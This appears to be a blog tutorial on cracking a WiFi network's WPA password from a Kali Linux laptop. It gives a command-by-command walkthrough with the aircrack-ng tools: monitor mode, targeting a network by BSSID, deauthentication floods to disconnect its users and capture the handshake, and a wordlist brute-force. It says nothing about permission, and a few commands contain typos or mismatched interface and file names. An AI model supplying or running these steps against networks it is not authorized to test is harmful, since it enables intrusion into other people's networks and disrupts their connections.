How to Hack WiFi Password Step by Step on Laptop

Welcome back to you this blog. In this blog, we will explain to you that How to Hack the Wi-Fi password step by step on the laptop. We will use the Kali Linux 2021.1 operating system. Kali Linux is the most powerful operating system for each penetration tester or ethical hacker. We have mentioned to each blog that Wi-Fi hacking tools pre-installed in Kali Linux, for example, aircrack-ng, airodump-ng. To acquire more knowledge of Wi-Fi hacking, read this blog till the end. Let’s jump into a table of content that we will cover on this Wi-Fi hacking blog.


Table of Content

  • How to Hack Wi-Fi (Wireless Network) Password

Let’s Start Hacking WiFi Password

In my case, my wireless adapter is with the name wlan0. In your case, it may be different. I will show you whether my monitor mode is enabled or not. For that, we will use the ifconfig command. According to the image below, The wifi monitor mode has not started yet.

ifconfig

wlan0

In this step, we will enable monitor mode on Kali Linux. For that, we will type the following command.

airmon-ng start wlan0

Now this command will enable the monitor mode on the wifi card.

monitor mode

Many times, during wifi password hacking, we have to enable monitor mode. At this time, you can see the below image. In this image, The monitor mode has enabled.

 wlan0mon 

wlan0mon

At this stage, We will scan the surroundings wifi network. For that, we will type the following command.

airodump-ng wlan0

These commands will display all the access points in your surroundings and also the clients connected to those access points.

airodumo-ng wlan0mon
Access Point

in this step, We will capture the packets of the target wifi network.

airodump-ng -c 11 –bssid 22:FB:6F:36:7D:5C -w /root/Desktop/wifi-packet wlan0mon

In this step, we will send deauthenticate packets to the connected clients. Until our wifi handshake is captured.

aireplay-ng –deauth 1000 -a 22:FB:6F:36:7D:5C wlan0mon

At this final step, we will have to crack wifi captured packets. For that, we will use the brute-attack to crack the wifi password. Now we will use a custom wordlist. If you want to generate your custom wordlist, you can visit my youtube channel.

aircrack-ng -a2 -b 22:FB:6F:36:7D:5C -w /usr/share/wordlists/rockyou.txt wifi01.cap

In the end, we got the wifi password.

Password Found

Latest Posts


3 Comments

Add a Comment

Your email address will not be published. Required fields are marked *